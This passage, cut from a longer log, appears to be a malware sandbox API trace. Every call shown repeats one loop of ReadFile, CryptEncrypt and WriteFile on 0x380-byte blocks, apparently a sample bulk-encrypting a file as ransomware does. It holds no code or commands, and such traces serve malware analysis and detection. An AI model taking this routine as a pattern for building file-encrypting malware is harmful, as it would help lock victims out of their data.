hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.764] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.765] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.766] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.767] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.768] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, 